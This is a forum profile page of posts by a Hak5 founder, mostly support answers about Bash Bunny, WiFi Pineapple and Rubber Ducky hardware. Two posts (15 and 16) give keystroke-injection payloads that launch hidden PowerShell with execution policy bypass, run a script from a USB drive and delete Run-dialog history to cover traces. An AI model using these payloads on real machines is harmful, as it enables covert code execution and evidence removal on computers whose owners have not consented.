Darren Kitchen

Root Admin
  • Posts: 4,887
  • Joined
  • Days Won: 248

Everything posted by Darren Kitchen

  1. QUACK runs from payloads/ so switch2/ is relative to that. When payloads execute both switch1 and switch2 are in the $PATH. This is going to change to something a lot more obvious in the next release. Squish - I advise copying the contents of those texts into the main payload.txt and trying it from that (obviously prefixing each ducky script command with "QUACK ") -- then we'll know if that's what's causing the LED to go off early. If that's the case, we'll need to tidy that up.
  2. That's strange. I'm having no problem with either. The git you'll want is git@github.com:hak5/bashbunny-payloads.git or simply https://github.com/hak5/bashbunny-payloads
  3. I can't recall ever finding a USB port unable to provide 150-200 mA (1 watt). I'd be seriously concerned if there were any out there. 2.5 watts is most common, with modern machines providing 5-10 watts.
  4. The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows' ability to recognize RNDIS as one. When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone, ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally. As for the USB disk - when the payload executes it can access the storage from /root/udisk. At the moment this gets unmounted from the Linux side when payload execution completes. So if you terminal in and ls /root/udisk you won't see anything.
  5. It really depends on what you're wanting to do. The Armory has some nice specs for a dev platform - so if you have a specific use case in mind and are keen on the programming, go for it. The Bash Bunny is a purpose built pentesting platform. We emphasize the convenience factor and really try to foster a healthy development community around the tools. It's a simple plan that's been working for us for nearly a decade as we've been making infosec tools. So - you could probably do some nifty attacks with the Armory, but there'll be more heavy lifting involved. As for the hardware differences - while Micro SD is nice for memory expansion, the fast SLC NAND memory in the Bash Bunny is one of the enabling factors for the quick boot -- which is very important for physical pentest engagements. The Bash Bunny has a 50% higher clock speed and 4x more cores. The other specs like RAM and dimensions are similar. At the end of the day it's really the software, community, and continued support you've come to know from Hak5 that makes the difference.
  6. The Bash Bunny averages 1.5A idle - 2A at load - so it works well with either the TETRA or NANO.
  7. Payloads repo is now live: https://github.com/hak5/bashbunny-payloads
  8. The Bash Bunny wiki is now live at: http://wiki.bashbunny.com/#!index.md The payload repo will be available shortly.
  9. The Bash Bunny is not a USB Rubber Ducky replacement. While it's compatible with Ducky Script and supports a HID attack mode, that's only one of 5 current attack vectors. The USB Rubber Ducky will always execute payloads faster (0.1 seconds vs 7 seconds), more economically (less than half the cost), and more covertly (with its generic flash drive case). For social engineering ops, USB drops and attacks which require the target to plug in the drive, the USB Rubber Ducky is still the gold standard.
  10. I'm tidying up a few things in the repo and will be setting it to public today - so stay tuned to bashbunny.com
  11. It's the kinda hardware you're gonna wanna hop on... PS: How do you know when a joke becomes a dad joke? It's apparent.
  12. Yes, the ATTACKMODE command accepts most combinations of RNDIS_ETHERNET, ECM_ETHERNET, STORAGE, SERIAL, and HID. Pick 3. You can also change ATTACKMODE at any time in a payload, conditionally. This thing is a beast...
  13. I don't know about 100 Mb/s - I don't have the means to easily test that right now - but I will say I use a TETRA at home as my primary AP with a dedicated LTE modem and always-on OpenVPN connection and easily achieve 40 Mb/s throughput. The limitation is the LTE modem more than anything as taking the OpenVPN tunnel out of the equation doesn't increase speed coming from the LTE modem. See these Hak5 episodes:
      https://www.hak5.org/frontpage/how-to-build-an-openvpn-access-point-hak5-2017
      https://www.hak5.org/frontpage/hak5-2018-how-to-build-an-openvpn-access-point-pt-2
      https://www.hak5.org/episodes/season-20/hak5-2019-linux-server-build-openvpn-from-scratch
      https://www.hak5.org/episodes/season-21/hak5-2111-how-to-tether-without-the-fees
  14. Yes - the button replays the payload by default. My apologies for the fault. Please contact shop@hak5.org and we will attend to this matter promptly.
  15. DELAY 3000
      GUI r
      DELAY 100
      STRING powershell -NoP -NonI -W Hidden -Exec Bypass "rp -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; $uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DK' } | select name; cd $uP.name; .\d.cmd"
      ENTER

      Executes "d.cmd" off the root of the USB drive with the label "DK" and clears Run dialog history, as seen in Hak5 episode 2112. To quickly and easily label the USB drive, select it from "My Computer" and press the F2 key.
  16. Fantastic payload 0x41414141. I really like the run line that both opens an obfuscated CMD as well as removes all traces of the command. Might I make one alteration? On Windows 10 you'll receive the following error:
      The screen cannot be set to the number of lines and columns specified.
      This is because Windows 10 has a minimum command prompt column size of 18, unlike previous versions 14. So to cover most bases, I recommend:
      STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
      Superb payload!
  17. MrKnickerbocker - you were sent an email reply from us on Sept 2 as well as Sept 9. We have not heard back from you on either thread. Please check your spam folder for an email from shop@hak5.org.
  18. QSDx25 - While we are a very small team of 4, we strive for excellence. Most correspondence is returned within 1-2 business days. My support queue is empty at the moment, so if for any reason you haven't heard back please email support@hak5.org and I'll see it right away. We unfortunately do not have the bandwidth to offer phone support. Depending on carrier, the tracking # may not update the first day. Sara is staying late answering emails now so you should have received a response if not shortly. Kerravon - The intention was not to single you out. The posts you are referencing must be from a different era as I haven't seen them. To clarify, the web interface was released as non-commercial creative commons on github. I acknowledge your good intentions and applaud you for your altruistic teaching efforts. That's a noble cause. Please reference our PMs regarding your NANO exchange. I'm happy to know it was just a return without RMA mistake. Sara should be contacting you shortly with details on the replacement. Best regards, Darren
  19. Kerravon - As I have explained to you in PM, these forums are here to support our product -- the WiFi Pineapple. At the time that the original Blue for Pineapple released, the Mark IV was a small volunteer supported endeavor using off-the-shelf equipment, and it was frequently cloned. Had we not sunk everything into the WiFi Pineapple at that time, that would have been the end of the project as we know it. Instead we went all in - and since then the WiFi Pineapple has grown into a project that supports the Hak5 team. It has enabled us to produce innovative custom hardware and provide the community with continued software updates for that hardware. It's enabled us to grow our shows, with HakTip, ThreatWire, Metasploit Minute and TekThing joining the ranks of Hak5. All of which provide the community with free education. So in short, I'm not "hell bent on keeping this quiet" -- I'm just not keen on spending resources on hosting a forum to support counterfeit devices that diminish the brand we've worked tirelessly to build. You don't need to agree with me, but you should respect my policy to support Hak5 and the half dozen people I employ who rely on this brand. Regarding your NANO support, I'm looking at the email thread with you from March 15 where I responded to your request with helpful advice and asked for clarification on a few things. I'm still waiting for a response from you to support@hak5.org. And no, Hak5 is not a "F*&%K the customers" sort of company. We stand behind our product and will do whatever it takes to make it right. We didn't get to where we are today without being customer focused. It's the same reason why we have 6 generations of the WiFi Pineapple at the same affordable price point - because unlike many in the InfoSec community we aren't into gouging. Lastly, I offer my deepest apologies that this situation has led to such an unhappy customer experience. Like I said, we stand behind our product and will do what it takes to make it right. 
If you please reply to the email dated March 15 I will happily continue to provide technical support and an exchange if one is needed. Best regards, Darren
  20. Hi all - Just getting back up to speed on this. From what I gather our recent back-end overhaul at wifipineapple.com has caused an issue with OTA module/infusion downloads for the Mark IV. All of these infusions still exist on our servers and I'm working towards making them available for installation by an alternate means shortly. I'll update this thread when it's available. Best regards, Darren
  21. Smarty - With the front (LED side) of the WiFi Pineapple TETRA facing you, the two antennas on the left are wlan0 and the two on the right are wlan1. Another way to look at it is that the two wlan0 antennas are closest to the RJ45 Ethernet port while the two wlan1 antennas are closest to the Reset button. Both radios are in a diversity configuration by default and ship with dual-band antennas. Also it sounds like your power issue is related to the extra draw of the LTE modem. The upgraded PSU will fix that. You'll be receiving an email shortly if you haven't already. Cheers, Darren
  22. That's 34.5 watts capacity. You'll never draw all of that power. You could get away with any two of the above three and be fine -- but what you're doing with three is prolonging your run time.
  23. I know there's a way to do this with screen, but I'm a minicom man myself so I'll give you setup instructions for that:
      Connect cable from PC to TETRA USB UART port
      sudo apt-get install minicom
      sudo minicom -s
      Go to Serial Port setup, then make sure it's set to /dev/ttyUSB0 as the device, 115200 as the speed, and 81N as in 8 data bits, 1 stop bit, no parity bit. Then save as default and either exit setup and re-issue sudo minicom without the -s, or select exit which'll drop you into the terminal. Press enter to activate -- you'll be prompted to login. If you run this while booting you can watch the kernel come to life. Keep this open and log what happens when there's an issue. Lemme tell you - having super convenient serial access in dev has been a boon. I highly recommend it. BTW you can do the same in Windows with PuTTY and I'm sure there's something out there for mac. I'll let the next guy school me on how screen > minicom later ;-)